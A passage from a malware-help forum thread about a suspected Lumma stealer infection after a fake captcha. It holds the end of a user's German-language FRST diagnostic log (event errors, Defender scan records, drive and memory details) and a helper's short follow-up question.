Dieses wird oft durch Dienste verursacht, die unter einem Benutzerkonto ausgeführt werden. Versuchen Sie die Dienste entweder unter dem Konto "LocalService" oder "NetworkService" auszuführen. Details - Zugriff verweigert Error: (12/30/2024 08:37:04 PM) (Source: Application Error) (EventID: 1000) (User: E595) Description: Name der fehlerhaften Anwendung: powershell.exe, Version: 10.0.22621.3085, Zeitstempel: 0x67701590 Name des fehlerhaften Moduls: ntdll.dll, Version: 10.0.22621.4541, Zeitstempel: 0xa1c8097c Ausnahmecode: 0xc0000374 Fehleroffset: 0x000eddbf ID des fehlerhaften Prozesses: 0x0x7fc0 Startzeit der fehlerhaften Anwendung: 0x0x1db5af22e446fd7 Pfad der fehlerhaften Anwendung: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Pfad des fehlerhaften Moduls: C:\WINDOWS\SYSTEM32\ntdll.dll Berichtskennung: 51215aa5-740e-4fd9-8469-a4e7f1e26cf0 Vollständiger Name des fehlerhaften Pakets: Anwendungs-ID, die relativ zum fehlerhaften Paket ist: Error: (12/27/2024 08:55:35 AM) (Source: Application Hang) (EventID: 1002) (User: NT-AUTORITÄT) Description: Das Programm ms-teamsupdate.exe Version 24295.605.3225.8804 hat aufgehört mit Windows zu interagieren und wurde geschlossen. Weitere Informationen zum Problem finden Sie im Problemverlauf in der Systemsteuerung „Sicherheit und Wartung“. Error: (12/19/2024 04:10:11 PM) (Source: Microsoft-Windows-Perflib) (EventID: 1023) (User: NT-AUTORITÄT) Description: Windows kann die erweiterbare Leistungsindikator-DLL "C:\WINDOWS\system32\sysmain.dll" nicht laden (Win32-Fehlercode 126). Systemfehler: ============= Error: (01/06/2025 11:42:12 AM) (Source: Microsoft-Windows-TPM-WMI) (EventID: 1033) (User: NT-AUTORITÄT) Description: In der EFI-Partition wurde ein möglicherweise gesperrter Start-Manager erkannt. 
Weitere Informationen finden Sie unter https://go.microsoft.com/fwlink/?linkid=2169931 Error: (01/06/2025 11:37:19 AM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Der Dienst "Google Update-Dienst (gupdate)" wurde aufgrund folgenden Fehlers nicht gestartet: Der Dienst antwortete nicht rechtzeitig auf die Start- oder Steuerungsanforderung. Error: (01/06/2025 11:37:19 AM) (Source: Service Control Manager) (EventID: 7009) (User: ) Description: Das Zeitlimit (30000 ms) wurde beim Verbindungsversuch mit dem Dienst Google Update-Dienst (gupdate) erreicht. Error: (01/06/2025 11:37:17 AM) (Source: Microsoft-Windows-TPM-WMI) (EventID: 1033) (User: NT-AUTORITÄT) Description: In der EFI-Partition wurde ein möglicherweise gesperrter Start-Manager erkannt. Weitere Informationen finden Sie unter https://go.microsoft.com/fwlink/?linkid=2169931 Error: (01/06/2025 11:35:17 AM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Der Dienst "CxUIUSvc" wurde aufgrund folgenden Fehlers nicht gestartet: Der Dienst antwortete nicht rechtzeitig auf die Start- oder Steuerungsanforderung. Error: (01/06/2025 11:35:17 AM) (Source: Service Control Manager) (EventID: 7009) (User: ) Description: Das Zeitlimit (45000 ms) wurde beim Verbindungsversuch mit dem Dienst CxUIUSvc erreicht. Error: (01/06/2025 11:35:07 AM) (Source: VBoxNetLwf) (EventID: 12) (User: ) Description: Der Treiber hat einen internen Treiberfehler auf \Device\VBoxNetLwf gefunden. Error: (01/06/2025 11:16:13 AM) (Source: VBoxNetLwf) (EventID: 12) (User: ) Description: Der Treiber hat einen internen Treiberfehler auf \Device\VBoxNetLwf gefunden. Windows Defender: ================ Date: 2025-01-06 08:25:04 Description: Die Microsoft Defender Antivirus-Überprüfung wurde vor ihrem Abschluss beendet. 
Überprüfungs-ID: {635D4E25-49F9-40E4-AF69-F6D992BD7900} Überprüfungstyp: Antimalware Überprüfungsparameter: Schnellüberprüfung Benutzer: NT-AUTORITÄT\SYSTEM Date: 2024-12-30 20:42:46 Description: Die Microsoft Defender Antivirus-Überprüfung wurde vor ihrem Abschluss beendet. Überprüfungs-ID: {8E707654-BE1A-4F1F-BC64-0FCAB0976B47} Überprüfungstyp: Antimalware Überprüfungsparameter: Schnellüberprüfung Benutzer: NT-AUTORITÄT\SYSTEM Date: 2024-12-19 18:47:06 Description: Die Microsoft Defender Antivirus-Überprüfung wurde vor ihrem Abschluss beendet. Überprüfungs-ID: {93AF2F57-1F88-49A7-A24F-A3AEB96F239B} Überprüfungstyp: Antimalware Überprüfungsparameter: Schnellüberprüfung Benutzer: NT-AUTORITÄT\SYSTEM Date: 2024-12-18 17:45:51 Description: Die Microsoft Defender Antivirus-Überprüfung wurde vor ihrem Abschluss beendet. Überprüfungs-ID: {D2D4903C-367C-4A33-949C-195B8026FEA3} Überprüfungstyp: Antimalware Überprüfungsparameter: Schnellüberprüfung Benutzer: NT-AUTORITÄT\SYSTEM Date: 2024-12-17 18:17:17 Description: Die Microsoft Defender Antivirus-Überprüfung wurde vor ihrem Abschluss beendet. Überprüfungs-ID: {12D3C73A-9EF0-48B4-BDB5-F6232E100156} Überprüfungstyp: Antimalware Überprüfungsparameter: Schnellüberprüfung Benutzer: NT-AUTORITÄT\SYSTEM Event[0] Date: 2024-05-20 17:36:14 Description: Bei Microsoft Defender Antivirus ist ein Fehler beim Aktualisieren der Sicherheitsinformationen aufgetreten. Neue Version der Sicherheitsinformationen: %Vorherige Version der Sicherheitsinformationen: 1.411.148.0 Update Source: Microsoft Update-Server Sicherheitstyp: AntiVirus Updatetyp: Voll Benutzer: NT-AUTORITÄT\SYSTEM Aktuelle Modulversion: %Vorherige Modulversion: 1.1.24040.1 Fehlercode: 0x80240016 Fehlerbeschreibung: Unerwartetes Problem bei der Überprüfung auf Updates. Informationen zum Installieren von Updates oder zur Problembehandlung finden Sie unter "Hilfe und Support". 
CodeIntegrity: =============== Date: 2024-05-30 15:48:47 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\fcon.dll because the set of per-page image hashes could not be found on the system. Date: 2024-04-29 14:40:34 Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Google\Chrome\Application\chrome.exe) attempted to load \Device\HarddiskVolume3\Program Files (x86)\Citrix\ICA Client\Receiver\FeatureFlagHelper64.dll that did not meet the Microsoft signing level requirements. Date: 2024-04-25 17:12:36 Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe) attempted to load \Device\HarddiskVolume3\Program Files (x86)\Citrix\ICA Client\Receiver\FeatureFlagHelper.dll that did not meet the Microsoft signing level requirements. ==================== Speicherinformationen =========================== BIOS: LENOVO R11ET45W (1.25 ) 07/04/2022 Hauptplatine: LENOVO 20NF0000GE Prozessor: AMD Ryzen 7 3700U with Radeon Vega Mobile Gfx Prozentuale Nutzung des RAM: 21% Installierter physikalischer RAM: 30605.63 MB Verfügbarer physikalischer RAM: 24015.54 MB Summe virtueller Speicher: 32525.63 MB Verfügbarer virtueller Speicher: 25988.89 MB ==================== Laufwerke ================================ Drive c: () (Fixed) (Total:302.68 GB) (Free:37.89 GB) (Model: WDC PC SN520 SDAPMUW-512G-1001) NTFS Drive d: () (Fixed) (Total:465.76 GB) (Free:375.65 GB) (Model: CT500MX500SSD1) NTFS \\?\Volume{810b3311-8b68-489b-97b7-8d8720c1f38f}\ () (Fixed) (Total:0.85 GB) (Free:0.09 GB) NTFS \\?\Volume{bb9fffbd-dd56-43ed-bbe2-b5f90fc216fa}\ (SYSTEM) (Fixed) (Total:0.25 GB) (Free:0.21 GB) FAT32 ==================== MBR & Partitionstabelle ==================== ========================================================== Disk: 0 (Protective MBR) (Size: 465.8 GB) (Disk ID: 00000000) Partition: GPT. 
========================================================== Disk: 1 (Size: 476.9 GB) (Disk ID: 2103C249) Partition: GPT. ==================== Ende von Addition.txt ======================= Marcel |
Yesterday, 19:11 | #2 |
/// Winkelfunktion /// TB-Süch-Tiger™ | Windows 11: Suspected infection with Lumma?-Stealer after fake captcha When did you do that? When I open the links mentioned above, all I get is some nonsense like this: Why am I seeing this page?